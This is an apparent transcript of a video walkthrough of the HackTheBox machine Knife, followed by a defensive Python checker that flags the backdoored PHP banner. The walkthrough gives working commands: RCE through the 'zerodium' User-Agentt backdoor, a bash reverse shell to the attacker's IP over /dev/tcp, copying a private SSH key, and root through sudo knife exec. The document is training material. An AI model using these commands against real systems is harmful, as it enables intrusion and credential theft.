HackTheBox - Knife

Captions
What's going on YouTube, this is IppSec. We're doing Knife from HackTheBox, which was a super simple, easy Linux box, and I already know a lot of people can be disappointed about the time length of this video. That being said, there's gonna be a surprise video posted Monday that is much longer and what I think a lot of people enjoy, and I guess now that I said it it's not going to be much of a surprise, but the contents are really good in that video. Anyways, back to this machine. It was pretty simple; there were just two steps involved. The first one is noticing the header in the HTTP request from the server contains a weird PHP version. If you Google that, you'll realize it's backdoored. You abuse the backdoor to get RCE on the box, and then knife is a setuid binary which is part of Chef, which is like a DevOps tool, that you can use to get root on the box. So with all that being said, let's just jump in.

As always, we start off with the nmap, and when I'm in a rush doing CTFs I always like running a full port scan with --min-rate set to 10,000 packets per second. I wouldn't do this in an actual environment because it can cause some issues, but in a HackTheBox thing, I mean, it's really nice because it will do a full port scan in about 15 seconds. The other flags we'll go over in just a minute if you don't know them by now, but it looks like there's just two ports open, so I'm going to do a regular nmap with -sC for default scripts, -sV to enumerate versions, -oA to output all formats, put it in the nmap directory and call it knife, then the IP address of 10.10.10.242. And since I know the ports I want to scan, I'm just going to specify -p and do 22 and 80, and that's going to make it go a little bit quicker.

While that goes, let's go and check out the website at 10.10.10.242, and it looks like some type of hospital website. Clicking around here I don't have anything. Looking at the source code, try to identify if it's like WordPress, Joomla, Drupal, like what is the content management system. I can't really find anything; it looks like just a static site. There's a lot of JavaScript, but I mean it doesn't look like it's from a content management system. So the first thing I always like doing is trying like index.html to find out what the extension of the server is. Since it is PHP, we know it hosts PHP scripts and we can go into a gobuster and scan with that. So gobuster dir -u http://10.10.10.242 -w, for the list, /opt, uh, actually yeah, /opt/SecLists/Discovery/Web-Content/raft-small-words.txt, -x php, so we add the PHP extension because we know it hosts PHP stuff. I'm going to do gobuster.out for the out file.

And let's take a look at the nmap scan. So we do have 22, this is SSH, and it is an Ubuntu server. Then we also have HTTP running Apache 2.4.41 and nothing really else there. So we're still waiting on the gobuster to finish, and we can take a look at the actual request to see if there's anything else, like is it giving us a cookie, because cookies are also something that can tell us the content, like what this is. And looking at the headers we see one weird thing: X-Powered-By: PHP/8.1.0-dev. This is a really odd tag, especially seeing anything like dev on a production, so I'm going to take a look at the specific version. We don't really have anything else to go on while gobuster is running, so just Googling this PHP string, and whenever you see the first result is Exploit-DB you know you're in for a good time. I'm not really going to use this script, because I mean I'm not going to really learn anything if I just copy and paste that. I think this is a blog post, so we can go look at this, read the full article. That's what I always like doing, and I remember this story. Their PHP had a back door put in it back March 28, 2021, around the time this box was released, and we can see "PHP source code targeted in backdoor attack".

And we can kind of take a look at this and see what it is we have: if "zerodium" is in whatever string this is, then it's going to pass it to zend_eval_string. Zend I think is like a PHP caching thing, uh, Zend PHP cache, is that what Zend is, uh, Zend cache, yeah. So it's passing it to some type of eval; it's adding eight characters, and then I don't know what. It's weird to see this "REMOVETHIS: sold to zerodium, mid 2017". I'm sure if we read this entire post it may make sense, but what it looks like it's doing is it's looking for the string "zerodium" and then going plus eight characters and trying to execute it. And if we look up here, is it going to tell us where it is? So zend find string, sizeof HTTP_USER_AGENT, so I'm guessing we put our User-Agent as "zerodium", which is eight characters: "zero" is four, "dium" is four, so that's eight, and it goes in eight and executes an eval. And there's a main difference between eval and exec: eval means it's probably not going to leave the language, exec means it's going to execute a system command. So because it's eval we probably want to write some PHP code.

So what I'm going to do is go back to my Burp Suite, because this is easier than just doing curl, and we're going to try this out. So we're going to put "zerodium" and then we can do echo "please subscribe" to see if we get output back, and I'm going to search the page for "please subscribe". I don't see anything. We can try, I think PHP just has sleep, sleep(10), actually let's do a sleep(5), and that's not working. Let's see, I'm just going to Google real quick, uh, PHP sleep, to see what it is. It looks like it is literally just sleep, yep. So that didn't work. The last thing we can try is like a connection back, so I'm going to set a netcat open on port 80 and we're going to try a few system commands. So we can do zerodium and then system('curl 10.10.14.8'), which is my IP address, and we go back here, we don't have anything. So I think I'm doing something wrong. Maybe curl is not on the box; we can try wget. And this can be one of those famous moments where I just have like a typo in zerodium or something. Let's see, zerodium... system, it's using single quotes, I'm using double quotes, is that going to cause an issue? See, wget didn't work. curl, maybe it's not getting the path, /usr/bin/curl, still nothing. And yes, I am 10.10.14.8. So this one's putting two t's in it, that looks like what it is, it actually has two t's. So we can try User-Agentt with two t's, and there we go, we have a request back.

So that was somewhat simple once we realized what that was. I don't really understand this backdoor, how like someone didn't expect it to be caught, but I'm gonna try my sleep real quick. So sleep(1), uh, let's do sleep(5): one, two, three, four, five, and we get a response back, there we go. I guess I counted too fast; that's 5100 milliseconds, so looks like we're good. Let us try a reverse shell. So let's go back into system, we can do bash -c, let's see, I'm gonna do this in single quotes, double q-, uh, double quotes and single quote: bash -c 'bash -i >& /dev/tcp/10.10.14.8/9001 0>&1', single, double. nc -lvnp 9001, see if we get a shell. Looks like we do, so let's do a proper TTY with python3 -c 'import pty; pty.spawn("/bin/bash")', then stty raw -echo, hit enter, ah, that didn't work, oh, fg, enter, enter. I thought I typed fg but guess I didn't. So let's export TERM=xterm. So now I can clear the screen and we can see what we have.

If we go to /home/james we can get user.txt. There is a .ssh with an id_rsa and a pub, so if we wanted to we could switch to a just regular shell. So if I cat this .ssh/id_rsa, that is a big file, let's copy this, then go to a new window, vi id_rsa, paste, chmod 600, and then ssh -i james, actually ssh -i id_rsa james@10.10.10.242. You don't actually have to do this but I always find, oh, looks like we can't, um, SSH, why can't we? Oh, that's not authorized_keys. If we just move this id_rsa.pub into authorized_keys then I'm guessing we can, come on, there we go. But I always like having a regular session, because who knows what's going to happen to this netcat session; if I can just run a command to get back on the box, I like that.

So we have a user.txt. If we look at sudo, we can run knife with sudo, and knife is part of Chef, so if I do man knife we can see if there's any quick wins. Doesn't look like we have manuals installed. We can always try going to GTFOBins and seeing if there's a quick win. So GTFOBins, look at knife, looks like there is. So this is going to be one easy box. So if I do sudo knife exec, id, looks like we have root, so we can go to /root and get root.txt. So that's probably going to be the box. I don't really know what else to show in this, so hope you guys enjoyed the video, take care, and I'll see you all next week.
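From the defender's side, as an added example that is not from the video or the box: a small Python checker that flags the X-Powered-By banner of the backdoored build and inspects raw request headers for the non-standard User-Agentt header and the "zerodium" trigger the backdoor hands to eval. The function names and the sample requests are my own construction.

```python
"""Defender-side checks for the backdoored PHP 8.1.0-dev build discussed above.
The backdoor reads the non-standard User-Agentt request header, looks for
"zerodium" and evals whatever follows it; sample requests here are constructed."""

BACKDOORED_VERSION = "PHP/8.1.0-dev"   # banner seen in X-Powered-By
TRIGGER = "zerodium"                   # 8-char marker the backdoor searches for


def parse_headers(raw_request: str) -> dict:
    """Split a raw HTTP request into a {lowercased name: value} dict.
    Only the header block is parsed; the request line and body are ignored."""
    head = raw_request.split("\r\n\r\n", 1)[0]
    headers = {}
    for line in head.split("\r\n")[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return headers


def is_backdoored_banner(response_headers: dict) -> bool:
    """True when the server advertises the backdoored development build.
    Expects lowercased header names, as parse_headers() produces."""
    return response_headers.get("x-powered-by", "").strip() == BACKDOORED_VERSION


def find_trigger(raw_request: str) -> list:
    """Flag the non-standard User-Agentt header and any header value carrying
    the trigger; the text after the trigger is what would reach eval."""
    findings = []
    headers = parse_headers(raw_request)
    if "user-agentt" in headers:
        findings.append("non-standard User-Agentt header present")
    for name, value in headers.items():
        idx = value.find(TRIGGER)
        if idx != -1:
            findings.append(f"trigger in {name}: payload={value[idx + len(TRIGGER):]}")
    return findings


# Constructed samples: a normal request and one carrying the backdoor trigger.
SAMPLE_BENIGN = "GET / HTTP/1.1\r\nHost: 10.10.10.242\r\nUser-Agent: Mozilla/5.0\r\n\r\n"
SAMPLE_TRIGGER = ("GET / HTTP/1.1\r\nHost: 10.10.10.242\r\nUser-Agent: Mozilla/5.0\r\n"
                  "User-Agentt: zerodiumecho 'please subscribe';\r\n\r\n")

if __name__ == "__main__":
    print(is_backdoored_banner({"x-powered-by": "PHP/8.1.0-dev"}))  # True
    for req in (SAMPLE_BENIGN, SAMPLE_TRIGGER):
        print(find_trigger(req))
```

The banner check is the cheap one to run across an estate; the header check belongs at a reverse proxy or in a packet capture, since a default Apache access log only records User-Agent, not the misspelt header.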
Info
Channel: IppSec
Views: 29,593
Id: 93JnRTF5sQM
Length: 12min 15sec (735 seconds)
Published: Sat Aug 28 2021